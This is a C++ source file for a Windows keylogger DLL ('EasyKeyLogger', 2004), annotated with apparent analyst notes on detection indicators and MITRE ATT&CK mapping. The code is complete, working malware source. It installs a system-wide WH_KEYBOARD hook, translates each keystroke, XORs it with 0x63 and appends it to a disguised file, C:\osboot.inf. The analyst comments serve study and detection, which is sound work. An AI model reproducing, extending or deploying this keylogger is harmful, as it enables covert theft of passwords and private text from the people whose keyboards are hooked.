EasyKeyLogger/DLL/EasyKeyLoggerDLL/DLLMain.cpp
// Downloaded from www.louis‑coder.com.
// Easy VC++ keylogger, can be extended by anyone.
// "Evil Hacker" is a pseudonym; the sample was created by Louis Coder.
// For questions or comments mail louis@louis‑coder.com.
// (c)2004 by Böser Hacker
// (c)2004 by Evil Hacker
//
// Hinweis: KeyHook *MUSS* in einer DLL erstellt werden (s. MSDN)
// NOTE: KeyHook *MUST* be created in a dll (see MSDN)
#include <windows.h> // für winuser.h u.a./for winuser.h and others
#include <winuser.h> // SetWindowsHookEx u.a.
#include <stdio.h> // C Datei‑Operationen/C file‑operations
// Prototypes
// Hook callback that KeyHook_Install registers for WH_KEYBOARD (defined at the end of this file).
LRESULT CALLBACK KeyboardProc (
int nCode, // hook code
WPARAM wParam, // virtual-key code
LPARAM lParam // keystroke-message information
);
// Install / remove the keyboard hook. Presumably called by the program that
// loads this DLL; how they are exported is not shown in this file.
BOOL WINAPI KeyHook_Install();
void WINAPI KeyHook_Remove();
// Second declaration of the same callback (first parameter named 'code' here);
// it declares nothing beyond the prototype above.
LRESULT CALLBACK KeyboardProc (
int code, // hook code
WPARAM wParam, // virtual-key code
LPARAM lParam // keystroke-message information
);
// Global variables
// Everything between the two data_seg pragmas is placed in a section named
// ".SHARDAT". Per the author this is required so that several program
// instances can use this DLL; how the section is mapped is not verifiable
// from this file.
#pragma data_seg(".SHARDAT")
static HHOOK HookHandle = NULL; // value returned by SetWindowsHookEx in KeyHook_Install; NULL means no hook handle is stored
// Hard-coded path of the file that KeyboardProc appends captured keys to.
// Analyst note: the path is a fixed string in this source and is therefore
// usable as a file-system indicator for this sample; the ".SHARDAT" section
// name is likely visible in the built DLL as well.
char LogFile[MAX_PATH] = {"C:\\osboot.inf"};
#pragma data_seg()
HINSTANCE hInstance; // DLL instance handle; assigned in DllMain on DLL_PROCESS_ATTACH (declared outside the named section)
// DLL entry point, called by the loader on the events listed in the switch.
// On process attach it stores the module handle for later use by
// KeyHook_Install; on process detach it calls KeyHook_Remove. Thread
// attach/detach are ignored. Always returns TRUE.
BOOL WINAPI DllMain (HINSTANCE hInst, DWORD fdwreason, LPVOID lpReserved)
{
switch (fdwreason)
{
case DLL_PROCESS_ATTACH: // a process loads the DLL
hInstance = hInst; // keep the module handle in the global; SetWindowsHookEx needs it
break;
case DLL_THREAD_ATTACH: // the process created a new thread (nothing to do)
break;
case DLL_THREAD_DETACH: // a thread terminated (nothing to do)
break;
case DLL_PROCESS_DETACH: // the process exits or the DLL is unloaded
{
// Remove the hook if a handle is stored (see KeyHook_Remove).
KeyHook_Remove();
break;
}
}
return TRUE;
}
// Registers KeyboardProc as a WH_KEYBOARD hook and stores the returned handle
// in HookHandle.
//
// Returns TRUE when no handle was stored before the call; the result of
// SetWindowsHookEx itself is not inspected. Returns FALSE when a handle is
// already stored (the author's note: the calling program should then
// terminate itself).
//
// Analyst note: SetWindowsHookEx with WH_KEYBOARD, a DLL module handle and
// thread id 0 is the hook-based input-capture pattern catalogued as MITRE
// ATT&CK T1056.001 (Input Capture: Keylogging). API-call telemetry for this
// combination, together with the hook DLL appearing as a loaded module in
// unrelated GUI processes, is a common place to look for it.
BOOL WINAPI KeyHook_Install()
{
if (!HookHandle) // install only once (author: a second install causes a Win32 'accident')
{
HookHandle = SetWindowsHookEx (
WH_KEYBOARD, // type of hook to install (WH_MOUSE, WH_SHELL, etc.)
(HOOKPROC)KeyboardProc, // address of hook procedure
hInstance, // module handle of this DLL, saved in DllMain
0 // thread to install the hook for (0: not limited to one thread; author: Windows-wide)
);
return TRUE;
}
else
return FALSE; // a hook handle is already stored
}
// Removes the keyboard hook if a handle is stored. HookHandle is cleared only
// when UnhookWindowsHookEx reports success, so a failed removal leaves the
// handle in place. The author notes that removing the hook is important,
// especially on Win32, to avoid a blue screen.
void WINAPI KeyHook_Remove()
{
if (HookHandle)
if (UnhookWindowsHookEx (HookHandle))
HookHandle = 0;
}
// WH_KEYBOARD hook procedure: appends one byte per accepted key event to the
// file named by LogFile, then passes the event on to the next hook.
//
// Parameters are those of a standard keyboard hook procedure:
//   nCode  - hook code; only HC_ACTION events are processed
//   wParam - virtual-key code
//   lParam - keystroke-message information (bit flags)
// Returns whatever CallNextHookEx returns.
//
// Analyst notes on the log file produced by this code:
//   * RETURN is written as a raw '\n'.
//   * Every other accepted key is written as (translated byte XOR 99), i.e.
//     a fixed single-byte XOR with 0x63; XORing those bytes with 0x63 again
//     recovers what was written.
//   * The file is opened in append mode and closed again for every accepted
//     key event, by whichever process the hook procedure is running in.
LRESULT CALLBACK KeyboardProc (
int nCode, // hook code
WPARAM wParam, // virtual-key code
LPARAM lParam // keystroke-message information
)
{ // Called by Windows when a key is pressed or held down within Windows.
// All keyboard-hook callbacks are called in a chain; if forwarding is slow
// or missing, input stutters or fails completely, which the person at the
// keyboard would notice.
char WriteChar;
char LogFileLocal[MAX_PATH];
// Copy the path from the global into a local buffer of the same size
// (author: required so that multiple program instances can use this DLL).
strcpy (LogFileLocal, LogFile);
if (nCode == HC_ACTION) // not every call is a key event to process (see MSDN)
{
// Tests bit 30 of lParam. Author's description: key newly pressed or
// 'official' auto-repeat -- NOTE(review): confirm the meaning of this bit
// against the KeyboardProc documentation.
if (lParam & 0x40000000)
{
// Key filter: SPACE, RETURN, or any virtual-key code in 0x2f..0x100.
if ((wParam == VK_SPACE) || (wParam == VK_RETURN) ||
((wParam >= 0x2f ) && (wParam <= 0x100)))
{
FILE *FileDescriptor = fopen (LogFileLocal, "a+"); // append mode; nothing is logged if the open fails
if (FileDescriptor)
{
if (wParam == VK_RETURN)
{
// RETURN is stored as an unobfuscated newline.
WriteChar = '\n';
fwrite (&WriteChar, 1, 1, FileDescriptor);
}
else
{
// Code block from a sample that was derived from another sample,
// which in turn was copied from the MSDN help (author's note).
BYTE KeyboardStateCurrent[256];
WORD KeyTranslated;
UINT KeyScanCode = 0;
// Query the state of all 256 virtual keys.
GetKeyboardState (KeyboardStateCurrent);
// Translate the virtual-key code plus keyboard state to a character.
// The return value of ToAscii is not checked and KeyTranslated is not
// initialised beforehand, so the logged byte is only meaningful when
// a translation took place.
ToAscii(
wParam, // virtual-key code
KeyScanCode, // scan code (always 0 here)
KeyboardStateCurrent, // address of key-state array
&KeyTranslated, // buffer for translated key
0 // active-menu flag
);
WriteChar = (char)KeyTranslated; // keep only the low byte
WriteChar = WriteChar ^ 99; // cheap obfuscation: XOR with the constant 99 (0x63)
fwrite (&WriteChar, 1, 1, FileDescriptor);
}
fclose (FileDescriptor);
}
}
}
}
// Forward the key event along the hook chain (possibly to other programs).
return CallNextHookEx (HookHandle, nCode, wParam, lParam);
}
[END OF FILE]